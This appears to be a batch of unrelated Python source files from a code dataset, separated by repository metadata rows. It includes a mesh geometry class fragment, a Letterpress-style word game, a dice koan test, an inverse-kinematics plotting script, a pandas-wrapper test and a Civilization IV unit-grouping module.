+ self._normals[2][1]
+ self._normals[2][2]
+ self._normals[2][3]
) / 4
return _normalize3D(np.r_[normal1, normal2, normal3])
@property
def edge_lengths(self):
"""Edge lengths"""
if getattr(self, "_edge_lengths", None) is None:
if self.dim == 2:
xy = self.gridN
A, D = index_cube("AD", self.vnN, self.vnEx)
edge1 = xy[D, :] - xy[A, :]
A, B = index_cube("AB", self.vnN, self.vnEy)
edge2 = xy[B, :] - xy[A, :]
self._edge_lengths = np.r_[mkvc(_length2D(edge1)), mkvc(_length2D(edge2))]
self._edge_tangents = np.r_[edge1, edge2] / np.c_[self._edge_lengths, self._edge_lengths]
elif self.dim == 3:
xyz = self.gridN
A, D = index_cube("AD", self.vnN, self.vnEx)
edge1 = xyz[D, :] - xyz[A, :]
A, B = index_cube("AB", self.vnN, self.vnEy)
edge2 = xyz[B, :] - xyz[A, :]
A, E = index_cube("AE", self.vnN, self.vnEz)
edge3 = xyz[E, :] - xyz[A, :]
self._edge_lengths = np.r_[
mkvc(_length3D(edge1)),
mkvc(_length3D(edge2)),
mkvc(_length3D(edge3)),
]
self._edge_tangents = (
np.r_[edge1, edge2, edge3]
/ np.c_[self._edge_lengths, self._edge_lengths, self._edge_lengths]
)
return self._edge_lengths
@property
def edge_tangents(self):
"""Edge tangents"""
if getattr(self, "_edge_tangents", None) is None:
self.edge_lengths # calling .edge_lengths will create the tangents
return self._edge_tangents
# DEPRECATIONS
vol = deprecate_property("cell_volumes", "vol", removal_version="1.0.0")
area = deprecate_property("face_areas", "area", removal_version="1.0.0")
edge = deprecate_property("edge_lengths", "edge", removal_version="1.0.0")
# tangent already deprecated in BaseMesh
# normals already deprecated in BaseMesh
| 35.804933 | 105 | 0.450686 |
aaaf433fe278a9910cd1bad3df2a801d2f72ee30
| 13,830 |
py
|
Python
|
Archive (old files)/pypress(alpha)-20151205.py
|
avisma/pypress
|
07f9d0db175f773453c383ef95401f7ee5623cc9
|
[
"MIT"
] | null | null | null |
Archive (old files)/pypress(alpha)-20151205.py
|
avisma/pypress
|
07f9d0db175f773453c383ef95401f7ee5623cc9
|
[
"MIT"
] | null | null | null |
Archive (old files)/pypress(alpha)-20151205.py
|
avisma/pypress
|
07f9d0db175f773453c383ef95401f7ee5623cc9
|
[
"MIT"
] | null | null | null |
# pypress.py
# Designed by Ben Underwood and Justin Kim
# A version of Letterpress for Python
# Original game designed and published by atebits
from graphics import *
import string
import random
import lib_button as button
def setAllActive(ButtonList):
for i in ButtonList:
i.activate()
def turnSwitch():
global color
global lastColor
if color == "blue":
color = "red"
lastColor = "blue"
elif color == "red":
color = "blue"
lastColor = "red"
def makeScore(chosenLetters):
letterList = []
for i in range(len(chosenLetters)):
letterList.append(chosenLetters[i])
return letterList
def isClicked(click, box):
boxClicked = None
global oldColor
print(oldColor)
totalButtonClicks = [0] * 25
wasClicked = [False] * 25
#global lastColor
#print(lastColor)
if box[0].clicked(click):
letter = box[0].getLabel()
box[0].deactivate()
oldColor[0] = lastColor
box[0].setFill(color, color)
boxClicked = 0
elif box[1].clicked(click):
letter = box[1].getLabel()
box[1].deactivate()
oldColor[1] = lastColor
box[1].setFill(color, color)
boxClicked = 1
elif box[2].clicked(click):
letter = box[2].getLabel()
box[2].deactivate()
oldColor[2] = lastColor
box[2].setFill(color, color)
boxClicked = 2
elif box[3].clicked(click):
letter = box[3].getLabel()
box[3].deactivate()
oldColor[3] = lastColor
box[3].setFill(color, color)
boxClicked = 3
elif box[4].clicked(click):
letter = box[4].getLabel()
box[4].deactivate()
oldColor[4] = lastColor
box[4].setFill(color, color)
boxClicked = 4
elif box[5].clicked(click):
letter = box[5].getLabel()
box[5].deactivate()
oldColor[5] = lastColor
box[5].setFill(color, color)
boxClicked = 5
elif box[6].clicked(click):
letter = box[6].getLabel()
box[6].deactivate()
oldColor[6] = lastColor
box[6].setFill(color, color)
boxClicked = 6
elif box[7].clicked(click):
letter = box[7].getLabel()
box[7].deactivate()
oldColor[7] = lastColor
box[7].setFill(color, color)
boxClicked = 7
elif box[8].clicked(click):
letter = box[8].getLabel()
box[8].deactivate()
oldColor[8] = lastColor
box[8].setFill(color, color)
boxClicked = 8
elif box[9].clicked(click):
letter = box[9].getLabel()
box[9].deactivate()
oldColor[9] = lastColor
box[9].setFill(color, color)
boxClicked = 9
elif box[10].clicked(click):
letter = box[10].getLabel()
box[10].deactivate()
oldColor[10] = lastColor
box[10].setFill(color, color)
boxClicked = 10
elif box[11].clicked(click):
letter = box[11].getLabel()
box[11].deactivate()
oldColor[11] = lastColor
box[11].setFill(color, color)
boxClicked = 11
elif box[12].clicked(click):
letter = box[12].getLabel()
box[12].deactivate()
oldColor[12] = lastColor
box[12].setFill(color, color)
boxClicked = 12
elif box[13].clicked(click):
letter = box[13].getLabel()
box[13].deactivate()
oldColor[13] = lastColor
box[13].setFill(color, color)
boxClicked = 13
elif box[14].clicked(click):
letter = box[14].getLabel()
box[14].deactivate()
oldColor[14] = lastColor
box[14].setFill(color, color)
boxClicked = 14
elif box[15].clicked(click):
letter = box[15].getLabel()
box[15].deactivate()
oldColor[15] = lastColor
box[15].setFill(color, color)
boxClicked = 15
elif box[16].clicked(click):
letter = box[16].getLabel()
box[16].deactivate()
oldColor[16] = lastColor
box[16].setFill(color, color)
boxClicked = 16
elif box[17].clicked(click):
letter = box[17].getLabel()
box[17].deactivate()
oldColor[17] = lastColor
box[17].setFill(color, color)
boxClicked = 17
elif box[18].clicked(click):
letter = box[18].getLabel()
box[18].deactivate()
oldColor[18] = lastColor
box[18].setFill(color, color)
boxClicked = 18
elif box[19].clicked(click):
letter = box[19].getLabel()
box[19].deactivate()
oldColor[19] = lastColor
box[19].setFill(color, color)
boxClicked = 19
elif box[20].clicked(click):
letter = box[20].getLabel()
box[20].deactivate()
oldColor[20] = lastColor
box[20].setFill(color, color)
boxClicked = 20
elif box[21].clicked(click):
letter = box[21].getLabel()
box[21].deactivate()
oldColor[21] = lastColor
box[21].setFill(color, color)
boxClicked = 21
elif box[22].clicked(click):
letter = box[22].getLabel()
box[22].deactivate()
oldColor[22] = lastColor
box[22].setFill(color, color)
boxClicked = 22
elif box[23].clicked(click):
letter = box[23].getLabel()
box[23].deactivate()
oldColor[23] = lastColor
box[23].setFill(color, color)
boxClicked = 23
elif box[24].clicked(click):
letter = box[24].getLabel()
box[24].deactivate()
oldColor[24] = lastColor
box[24].setFill(color, color)
boxClicked = 24
else: letter = None
return letter, boxClicked
def main():
####### Make Function? #####
win = GraphWin("pypress.py", 700, 600)
win.setCoords(0, 0, 700, 600)
box = ["","","","","","","","","","","","","",
"","","","","","","","","","","",""]
upLeft = Point(100, 500)
downRight = Point(150, 450)
width = 100# downRight.getX() - upLeft.getX()
height = 100# upLeft.getY() - downRight.getY()
center = Point(150, 50) ##Revert if needed##
for i in range(25): # Draw Buttons
box[i] = button.Button(win, center, width, height, str(box[i]))
## box[i] = Rectangle(upLeft, Point(200, 400))
## box[i].draw(win)
if not i in [4, 9, 14, 19]:
if round(center.getX()) in [150, 350, 550]:
center.move(0, 100)
else:
center.move(0, -100)
else:
center.move(100, 0)
#center.move(dx, dy)
## box[i].move(100 * i - (500 * (int(i/5))), -100 * (int(i/5)))
## for click in range(10):
## x = win.getMouse()
## x.draw(win)
## print(x.getX(), x.getY())
##
########
######## Make Function? #####
global letters
letters = []
for i in range(25): # Label buttons
letters.append(random.choice(string.ascii_uppercase))
box[i].label.setSize(20)
box[i].label.setText(letters[i])
box[i].activate()
print(letters, "\n")
## tile = Text(downRight, letters[i])
##
## tile.move(100 * i - (500 * (int(i/5))), -100 * (int(i/5)))
##
## tile.setSize(20)
##
## tile.draw(win)
########
submitButton = button.Button(win, Point(650, 550), 70, 30, "submit!")
submitButton.activate()
#submitText.draw(win)
#Rectangle(Point(615, 565), Point(685, 535)).draw(win)
####### Make Function? ###
chosenLetters = ""
drawChosenLetters = Text(Point(350, 550), chosenLetters)
drawChosenLetters.setSize(20)
drawChosenLetters.draw(win)
#######
#boxIndex = list(range(25))
global color
global lastColor
global oldColor
color = "blue"
lastColor = "light gray"
oldColor = [None] * 25
testCount = 0
submit = False
invalidText = Text(Point(650, 515), "Not a valid word!")
redLetters = []
blueLetters = []
wordlist = open("wordlist.txt")
while (len(redLetters) + len(blueLetters)) < 25:
while True:
click = win.getMouse()
if submitButton.clicked(click):
if chosenLetters.lower() not in wordlist.read():
invalidText.draw(win)
print(chosenLetters)
else:
submitButton.deactivate()
print("Breaking...")
break
## if 620 < click.getX() < 680:
##
## if 520 < click.getY() < 580:
## submit = True
## for i in range(25):
## letters.append(box[i].getLabel())
##
## print(letters)
letter, boxClicked = isClicked(click, box)
if letter != None:
chosenLetters = chosenLetters + letter
try:
if letters[boxClicked] != None:
print("Removing from 'letters'")
print(boxClicked)
letters[boxClicked] = None
else:
print("valueError... Redirecting...")
if color == 'blue':
try:
if oldColor[boxClicked] == color:
blueLetters.remove(letter)
print("Blue clicked their own letter.")
else:
print("Removing from Red")
redLetters.remove(letter)
print("No more of this letter? "
"removed letter from Red")
except ValueError:
if letter in blueLetters:
print("Never mind")
blueLetters.remove(letter) # See below comment
pass
elif color == 'red':
try:
if oldColor[boxClicked] == color:
redLetters.remove(letter)
print("Red clicked their own letter.")
else:
print("Removing from Blue")
blueLetters.remove(letter)
print("No more of this letter? "
'removed letter from Blue')
except ValueError:
if letter in redLetters:
print("Never mind")
redLetters.remove(letter) #At this point, the
# letter has already been
# added to 'chosenLetters'.
# Removing the existing
# letter from the list
# prevents the program from
# duplicating the letter,
# as the letter will be
# re-added as part of the
# new word.
pass
else: print('Neither team\n',letters)
except IndexError:
print("Index Error, Redirecting...")
print(letters)
print(len(letters))
drawChosenLetters.setText(chosenLetters)
## if 500 > click.getY() > 400:
##
## if 100 < click.getX() < 200:
##
## chosenLetters = chosenLetters + (letters[0])
##
## letters[0] = ""
##
## drawChosenLetters.setText(chosenLetters)
##
## elif click.getX() < 300:
##
## chosenLetters = chosenLetters + (letters[1])
## letters[1] = ""
## drawChosenLetters.setText(chosenLetters)
##
## elif click.getX() < 400:
## chosenLetters = chosenLetters
letterList = makeScore(chosenLetters)
if color == 'blue':
blueLetters = blueLetters + letterList
elif color == 'red':
redLetters = redLetters + letterList
print(blueLetters, redLetters)
turnSwitch()
chosenLetters = ""
drawChosenLetters.setText(chosenLetters)
print("Switching Turns")
testCount = testCount + 1
submit = True
submitButton.activate()
setAllActive(box)
print("Finished!")
print(letters)
print(len(blueLetters), len(redLetters))
print(len(letters))
print("Exiting...")
win.getMouse()
win.close()
if __name__ == "__main__":
main()
| 13,830 | 13,830 | 0.464208 |
feb98ce1b41e302847a5e10389f9d6d3e747abad
| 1,822 |
py
|
Python
|
python_koans/python3/koans/about_dice_project.py
|
kipel/koans
|
752ce65a99c27a0e766276039bf48b4a5e98e62a
|
[
"MIT"
] | null | null | null |
python_koans/python3/koans/about_dice_project.py
|
kipel/koans
|
752ce65a99c27a0e766276039bf48b4a5e98e62a
|
[
"MIT"
] | null | null | null |
python_koans/python3/koans/about_dice_project.py
|
kipel/koans
|
752ce65a99c27a0e766276039bf48b4a5e98e62a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
import random
class DiceSet:
def __init__(self):
self._values = None
@property
def values(self):
return self._values
def roll(self, n):
from random import randint
self._values = [randint(1, 6) for _ in range(n)]
class AboutDiceProject(Koan):
def test_can_create_a_dice_set(self):
dice = DiceSet()
self.assertTrue(dice)
def test_rolling_the_dice_returns_a_set_of_integers_between_1_and_6(self):
dice = DiceSet()
dice.roll(5)
self.assertTrue(isinstance(dice.values, list), "should be a list")
self.assertEqual(5, len(dice.values))
for value in dice.values:
self.assertTrue(value >= 1 and value <= 6, "value " + str(value) + " must be between 1 and 6")
def test_dice_values_do_not_change_unless_explicitly_rolled(self):
dice = DiceSet()
dice.roll(5)
first_time = dice.values
second_time = dice.values
self.assertEqual(first_time, second_time)
def test_dice_values_should_change_between_rolls(self):
dice = DiceSet()
dice.roll(5)
first_time = dice.values
dice.roll(5)
second_time = dice.values
self.assertNotEqual(first_time, second_time, \
"Two rolls should not be equal")
# THINK ABOUT IT:
#
# If the rolls are random, then it is possible (although not
# likely) that two consecutive rolls are equal. What would be a
# better way to test this?
def test_you_can_roll_different_numbers_of_dice(self):
dice = DiceSet()
dice.roll(3)
self.assertEqual(3, len(dice.values))
dice.roll(1)
self.assertEqual(1, len(dice.values))
| 27.19403 | 106 | 0.629528 |
c4a3dfabddf483ac731b96b800cddbc7386067bf
| 60 |
py
|
Python
|
Tutorial/Python Bootcamp/Src/Day #17/game.py
|
lzzzam/Python_Scripts
|
f35c1acef13642e444b50d21dc94d9de2ce5d322
|
[
"MIT"
] | null | null | null |
Tutorial/Python Bootcamp/Src/Day #17/game.py
|
lzzzam/Python_Scripts
|
f35c1acef13642e444b50d21dc94d9de2ce5d322
|
[
"MIT"
] | null | null | null |
Tutorial/Python Bootcamp/Src/Day #17/game.py
|
lzzzam/Python_Scripts
|
f35c1acef13642e444b50d21dc94d9de2ce5d322
|
[
"MIT"
] | null | null | null |
import quiz
game = quiz.game(quiz.questionTable)
game.run()
| 15 | 36 | 0.766667 |
9103716f240ebb685edfea1d7dd588c839f6b9f0
| 1,712 |
py
|
Python
|
examples/plot_trajectory.py
|
rock-learning/approxik
|
877d50d4d045457593a2fafefd267339a11de20f
|
[
"BSD-3-Clause"
] | 1 |
2020-03-27T01:53:57.000Z
|
2020-03-27T01:53:57.000Z
|
examples/plot_trajectory.py
|
rock-learning/approxik
|
877d50d4d045457593a2fafefd267339a11de20f
|
[
"BSD-3-Clause"
] | null | null | null |
examples/plot_trajectory.py
|
rock-learning/approxik
|
877d50d4d045457593a2fafefd267339a11de20f
|
[
"BSD-3-Clause"
] | 1 |
2020-12-18T02:09:21.000Z
|
2020-12-18T02:09:21.000Z
|
import sys
import pytransform.rotations as pyrot
from visualization import *
from utils import parse_args
from convert import trajectory_ik, trajectory_fk, timing_report, reaching_report
from approxik import ApproxInvKin, ExactInvKin
def print_usage():
print("Usage: <script> <filename> [<base_link> <endeffector_link>] "
"trajectory <file>")
if __name__ == "__main__":
try:
i = sys.argv.index("trajectory")
except ValueError:
print_usage()
exit(1)
if len(sys.argv) < i + 2:
print_usage()
exit(1)
trajectory_filename = sys.argv[i + 1]
print("Using trajectory from file '%s'" % trajectory_filename)
filename, base_link, ee_link = parse_args()
aik = ApproxInvKin(filename, base_link, ee_link, 1.0, 0.001, verbose=0)
eik = ExactInvKin(filename, base_link, ee_link, 1e-4, 200, verbose=0)
P = np.loadtxt(trajectory_filename)
Qa, timings = trajectory_ik(P, aik)
reaching_report(P, Qa, aik, label="Approximate IK")
timing_report(timings, "Approximate IK")
Pa = trajectory_fk(Qa, aik)
Qe, timings, reachable = trajectory_ik(P, eik, return_reachable=True)
reaching_report(P, Qe, eik, label="Exact IK")
timing_report(timings, "Exact IK")
Pe = trajectory_fk(Qe, eik)
Pe[np.logical_not(reachable)] = np.nan
Qe[np.logical_not(reachable)] = np.nan
ax = plot_pose_trajectory(P, Pa)
ax.set_xlim((0.2, 0.7))
ax.set_ylim((-0.25, 0.25))
ax.set_zlim((0.5, 1.0))
ax = plot_pose_trajectory(P, Pe)
ax.set_xlim((0.2, 0.7))
ax.set_ylim((-0.25, 0.25))
ax.set_zlim((0.5, 1.0))
plot_joint_trajectories([Qa, Qe], labels=["Approximation", "Exact"])
plt.show()
| 30.035088 | 80 | 0.663551 |
8ea8db2352a0314c9858182ef4ae7682d7b0b322
| 847 |
py
|
Python
|
kadro/tests/test_composability.py
|
koaning/kadro
|
cbf993e5142d1ade26ac5922d7d15784d56b3db6
|
[
"MIT"
] | 13 |
2017-03-01T15:19:43.000Z
|
2021-09-23T21:02:27.000Z
|
kadro/tests/test_composability.py
|
koaning/kadro
|
cbf993e5142d1ade26ac5922d7d15784d56b3db6
|
[
"MIT"
] | 9 |
2017-02-03T10:13:22.000Z
|
2018-05-28T21:26:10.000Z
|
kadro/tests/test_composability.py
|
koaning/kadro
|
cbf993e5142d1ade26ac5922d7d15784d56b3db6
|
[
"MIT"
] | 3 |
2018-03-20T03:41:28.000Z
|
2020-07-03T06:00:16.000Z
|
import unittest
import numpy as np
import pandas as pd
import kadro as kd
np.random.seed(42)
n = 20
df = pd.DataFrame({
'a': np.random.randn(n),
'b': np.random.randn(n),
'c': ['foo' if x > 0.5 else 'bar' for x in np.random.rand(n)],
'd': ['fizz' if x > 0.6 else 'bo' for x in np.random.rand(n)]
})
df = df.sort_values(['c', 'd'])
kf = kd.Frame(df)
class Composables(unittest.TestCase):
def test_compose1(self):
"""Test that grouping has an effect on mutate."""
new = (kf
.group_by('c', 'd')
.mutate(e = lambda _: _['a'].shift())
.ungroup())
self.assertEqual(len(new.groups), 0)
self.assertEqual(new.df.iloc[0]['a'], new.df.iloc[1]['e'])
self.assertEqual(np.isnan(new.df.iloc[0]['e']), True)
if __name__ == '__main__':
unittest.main()
| 27.322581 | 66 | 0.566706 |
2d803caf4c2e033c8297442743477ec654ed993f
| 11,750 |
py
|
Python
|
Assets/Python/BUG/UnitGrouper.py
|
Imperator-Knoedel/Sunset
|
19c95f4844586b96341f3474b58e0dacaae485b9
|
[
"MIT"
] | 1 |
2019-08-05T18:36:14.000Z
|
2019-08-05T18:36:14.000Z
|
Assets/Python/BUG/UnitGrouper.py
|
Imperator-Knoedel/Sunset
|
19c95f4844586b96341f3474b58e0dacaae485b9
|
[
"MIT"
] | null | null | null |
Assets/Python/BUG/UnitGrouper.py
|
Imperator-Knoedel/Sunset
|
19c95f4844586b96341f3474b58e0dacaae485b9
|
[
"MIT"
] | null | null | null |
## UnitGrouper
##
## Builds groups of units for use in reporting or screens.
##
## Copyright (c) 2008 The BUG Mod.
##
## Author: EmperorFool
from CvPythonExtensions import *
import BugUtil
import UnitUtil
from Consts import *
from RFCUtils import utils
# BUG - Mac Support - start
BugUtil.fixSets(globals())
# BUG - Mac Support - end
# globals
gc = CyGlobalContext()
# Base grouping classes
class Grouper:
"""
Holds all Grouping definitions.
"""
def __init__(self):
self.groupings = []
self.groupingsByKey = {}
def _addGrouping(self, grouping):
grouping.index = len(self.groupings)
self.groupings.append(grouping)
self.groupingsByKey[grouping.key] = grouping
def getGrouping(self, key):
if key in self.groupingsByKey:
return self.groupingsByKey[key]
else:
return None
def __getitem__(self, key):
if isinstance(key, int):
return self.groupings[key]
else:
return self.groupingsByKey(key)
def __iter__(self):
return self.groupings.__iter__()
def iterkeys(self):
return self.groupingsByKey.iterkeys()
def itervalues(self):
return self.groupingsByKey.itervalues()
def iteritems(self):
return self.groupingsByKey.iteritems()
class Grouping:
"""
Applies a formula to place units into groups.
key: used for sorting groupings; must be in the range [0, 999] inclusive
title: used to display the group
"""
def __init__(self, key, title):
self.index = None
self.key = key
if title.startswith("TXT_KEY_"):
self.title = BugUtil.getPlainText(title)
else:
self.title = title
self.groups = {}
def _addGroup(self, group):
self.groups[group.key] = group
def calcGroupKeys(self, unit, player, team):
return None
class Group:
"""
Represents a single group value within a grouping.
key: used for sorting groups; must be in the range [0, 999] inclusive
title: used to display the group
"""
def __init__(self, grouping, key, title):
self.grouping = grouping
self.key = key
if title.startswith("TXT_KEY_"):
self.title = BugUtil.getPlainText(title)
else:
self.title = title
def getTitle(self):
return self.title
# Grouping definitions
class UnitTypeGrouping(Grouping):
"""
Groups units by their unit type.
Ex: Warrior, Maceman, Panzer
"""
def __init__(self):
Grouping.__init__(self, "type", "TXT_KEY_UNIT_GROUPER_TYPE_GROUPING")
for i in range(gc.getNumUnitInfos()):
if i in dFemaleGreatPeople.values(): continue # combine female and male units
info = gc.getUnitInfo(i)
if info:
self._addGroup(Group(self, i, info.getDescription()))
def calcGroupKeys(self, unit, player, team):
iUnitType = utils.getDefaultGreatPerson(unit.getUnitType()) # merge male and female GP
return (iUnitType,)
class UnitCombatGrouping(Grouping):
"""
Groups units by their combat type.
Ex: None, Melee, Gunpowder, Naval
"""
def __init__(self):
Grouping.__init__(self, "combat", "TXT_KEY_UNIT_GROUPER_COMBAT_GROUPING")
self.NONE = 0
self._addGroup(Group(self, self.NONE, "TXT_KEY_UNIT_GROUPER_COMBAT_GROUP_NONE"))
for i in range(gc.getNumUnitCombatInfos()):
info = gc.getUnitCombatInfo(i)
if info:
self._addGroup(Group(self, i + 1, info.getDescription()))
def calcGroupKeys(self, unit, player, team):
return (gc.getUnitInfo(unit.getUnitType()).getUnitCombatType() + 1,)
class LevelGrouping(Grouping):
"""
Groups units by their level, 1 to MAX_LEVEL (50).
Units over level MAX_LEVEL are put into the MAX_LEVEL group.
"""
def __init__(self):
Grouping.__init__(self, "level", "TXT_KEY_UNIT_GROUPER_LEVEL_GROUPING")
self.MAX_LEVEL = 50
for i in range(self.MAX_LEVEL):
self._addGroup(Group(self, i, BugUtil.getText("TXT_KEY_UNIT_GROUPER_LEVEL_GROUP", (str(i),))))
self._addGroup(Group(self, self.MAX_LEVEL, BugUtil.getText("TXT_KEY_UNIT_GROUPER_LEVEL_GROUP", ("%d+" % self.MAX_LEVEL,))))
def calcGroupKeys(self, unit, player, team):
return (max(0, min(unit.getLevel(), self.MAX_LEVEL)),)
class PromotionGrouping(Grouping):
"""
Groups units by their promotions.
Ex: Combat 1, Cover, Tactics
"""
def __init__(self):
Grouping.__init__(self, "promo", "TXT_KEY_UNIT_GROUPER_PROMOTION_GROUPING")
self.NONE = 0
self.NO_PROMOS = (0,)
self._addGroup(Group(self, self.NONE, "TXT_KEY_UNIT_GROUPER_PROMOTION_GROUP_NONE"))
for i in range(gc.getNumPromotionInfos()):
info = gc.getPromotionInfo(i)
if info:
self._addGroup(Group(self, i + 1, '<img=%s size=16></img> %s' %
(info.getButton(), info.getDescription())))
def calcGroupKeys(self, unit, player, team):
promos = []
for iPromo in range(gc.getNumPromotionInfos()):
if unit.isHasPromotion(iPromo):
promos.append(iPromo + 1)
if not promos:
promos = self.NO_PROMOS
return promos
class LocationGrouping(Grouping):
"""
Groups units by their location on the map.
Ex: Domestic City, Friendly City, Enemy Territory
"""
def __init__(self):
Grouping.__init__(self, "loc", "TXT_KEY_UNIT_GROUPER_LOCATION_GROUPING")
(
self.DOMESTIC_CITY,
self.DOMESTIC_TERRITORY,
self.TEAM_CITY,
self.TEAM_TERRITORY,
self.FRIENDLY_CITY,
self.FRIENDLY_TERRITORY,
self.NEUTRAL_TERRITORY,
self.ENEMY_TERRITORY,
self.BARBARIAN_TERRITORY
) = range(9)
self._addGroup(Group(self, self.DOMESTIC_CITY, "TXT_KEY_UNIT_GROUPER_LOCATION_GROUP_DOMESTIC_CITY"))
self._addGroup(Group(self, self.DOMESTIC_TERRITORY, "TXT_KEY_UNIT_GROUPER_LOCATION_GROUP_DOMESTIC_TERRITORY"))
self._addGroup(Group(self, self.TEAM_CITY, "TXT_KEY_UNIT_GROUPER_LOCATION_GROUP_TEAM_CITY"))
self._addGroup(Group(self, self.TEAM_TERRITORY, "TXT_KEY_UNIT_GROUPER_LOCATION_GROUP_TEAM_TERRITORY"))
self._addGroup(Group(self, self.FRIENDLY_CITY, "TXT_KEY_UNIT_GROUPER_LOCATION_GROUP_FRIENDLY_CITY"))
self._addGroup(Group(self, self.FRIENDLY_TERRITORY, "TXT_KEY_UNIT_GROUPER_LOCATION_GROUP_FRIENDLY_TERRITORY"))
self._addGroup(Group(self, self.NEUTRAL_TERRITORY, "TXT_KEY_UNIT_GROUPER_LOCATION_GROUP_NEUTRAL_TERRITORY"))
self._addGroup(Group(self, self.ENEMY_TERRITORY, "TXT_KEY_UNIT_GROUPER_LOCATION_GROUP_ENEMY_TERRITORY"))
self._addGroup(Group(self, self.BARBARIAN_TERRITORY, "TXT_KEY_UNIT_GROUPER_LOCATION_GROUP_BARBARIAN_TERRITORY"))
def calcGroupKeys(self, unit, player, team):
plot = unit.plot()
if not plot or plot.isNone():
return None
if plot.isBarbarian():
return (self.BARBARIAN_TERRITORY,)
teamId = team.getID()
ownerId = plot.getRevealedOwner(teamId, False)
if ownerId == -1:
return (self.NEUTRAL_TERRITORY,)
elif ownerId == player.getID():
if plot.isCity():
return (self.DOMESTIC_CITY,)
else:
return (self.DOMESTIC_TERRITORY,)
else:
owner = gc.getPlayer(ownerId)
ownerTeamId = owner.getTeam()
if ownerTeamId == teamId:
if plot.isCity():
return (self.TEAM_CITY,)
else:
return (self.TEAM_TERRITORY,)
elif team.isAtWar(ownerTeamId):
return (self.ENEMY_TERRITORY,)
else:
if plot.isCity():
return (self.FRIENDLY_CITY,)
else:
return (self.FRIENDLY_TERRITORY,)
class OrderGrouping(Grouping):
"""
Groups units by their current order/action.
Ex: Fortify, Go To, Blockade
"""
def __init__(self):
Grouping.__init__(self, "order", "TXT_KEY_UNIT_GROUPER_ORDER_GROUPING")
(
self.ORDER_NONE,
self.ORDER_SKIP,
self.ORDER_SLEEP,
self.ORDER_FORTIFY,
self.ORDER_HEAL,
self.ORDER_SENTRY,
self.ORDER_INTERCEPT,
self.ORDER_PATROL,
self.ORDER_PLUNDER,
self.ORDER_BUILD,
self.ORDER_CONSTRUCT,
self.ORDER_GOTO,
self.ORDER_EXPLORE,
self.ORDER_AUTO_BUILD,
self.ORDER_AUTO_NETWORK,
self.ORDER_AUTO_CITY,
self.ORDER_AUTO_RELIGION,
self.ORDER_OTHER,
) = range(18)
self._addGroup(Group(self, self.ORDER_NONE, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_NONE"))
self._addGroup(Group(self, self.ORDER_SKIP, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_SKIP"))
self._addGroup(Group(self, self.ORDER_SLEEP, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_SLEEP"))
self._addGroup(Group(self, self.ORDER_FORTIFY, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_FORTIFY"))
self._addGroup(Group(self, self.ORDER_HEAL, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_HEAL"))
self._addGroup(Group(self, self.ORDER_SENTRY, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_SENTRY"))
self._addGroup(Group(self, self.ORDER_INTERCEPT, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_INTERCEPT"))
self._addGroup(Group(self, self.ORDER_PATROL, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_PATROL"))
self._addGroup(Group(self, self.ORDER_PLUNDER, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_PLUNDER"))
self._addGroup(Group(self, self.ORDER_BUILD, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_BUILD"))
self._addGroup(Group(self, self.ORDER_CONSTRUCT, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_CONSTRUCT"))
self._addGroup(Group(self, self.ORDER_GOTO, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_GOTO"))
self._addGroup(Group(self, self.ORDER_EXPLORE, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_EXPLORE"))
self._addGroup(Group(self, self.ORDER_AUTO_BUILD, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_AUTO_BUILD"))
self._addGroup(Group(self, self.ORDER_AUTO_NETWORK, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_AUTO_NETWORK"))
self._addGroup(Group(self, self.ORDER_AUTO_CITY, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_AUTO_CITY"))
self._addGroup(Group(self, self.ORDER_AUTO_RELIGION, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_AUTO_RELIGION"))
self._addGroup(Group(self, self.ORDER_OTHER, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_OTHER"))
def calcGroupKeys(self, unit, player, team):
eOrder = UnitUtil.getOrder(unit)
if eOrder >= self.ORDER_OTHER:
return (self.ORDER_OTHER,)
else:
return (eOrder,)
class StandardGrouper(Grouper):
def __init__(self):
Grouper.__init__(self)
self._addGrouping(UnitTypeGrouping())
self._addGrouping(UnitCombatGrouping())
self._addGrouping(LevelGrouping())
self._addGrouping(PromotionGrouping())
self._addGrouping(LocationGrouping())
self._addGrouping(OrderGrouping())
# Classes for tracking stats about groups and units
class GrouperStats:
"""
Holds stats for a set of groupings.
"""
def __init__(self, grouper):
self.grouper = grouper
self.groupings = {}
for grouping in self.grouper.groupings:
self._addGrouping(GroupingStats(grouping))
def _addGrouping(self, grouping):
self.groupings[grouping.grouping.key] = grouping
def processUnit(self, player, team, unit):
stats = UnitStats(unit.getOwner(), unit.getID(), unit)
for grouping in self.groupings.itervalues():
grouping._processUnit(player, team, stats)
return stats
def getGrouping(self, key):
if key in self.groupings:
return self.groupings[key]
else:
return None
def itergroupings(self):
return self.groupings.itervalues()
class GroupingStats:
"""
Holds stats for a grouping.
"""
def __init__(self, grouping):
self.grouping = grouping
self.groups = {}
for group in self.grouping.groups.itervalues():
self._addGroup(GroupStats(group))
def _addGroup(self, group):
self.groups[group.group.key] = group
def _processUnit(self, player, team, unitStats):
keys = self.grouping.calcGroupKeys(unitStats.unit, player, team)
for key in keys:
self.groups[key]._addUnit(unitStats)
def itergroups(self):
return self.groups.itervalues()
class GroupStats:
"""
Holds stats for a group of units.
"""
def __init__(self, group):
self.group = group
self.units = set()
def _addUnit(self, unitStats):
self.units.add(unitStats)
def title(self):
return self.group.title
def size(self):
return len(self.units)
def isEmpty(self):
return self.size() == 0
class UnitStats:
"""
Holds stats about a single unit.
"""
def __init__(self, playerId, unitId, unit):
self.key = (playerId, unitId)
self.unit = unit
def __hash__(self):
return hash(self.key)
def __eq__(self, other):
return self.key == other.key
| 29.822335 | 125 | 0.743574 |
69a5ae3999413d7872c2555766cda7fb0cfbd396
| 3,480 |
py
|
Python
|
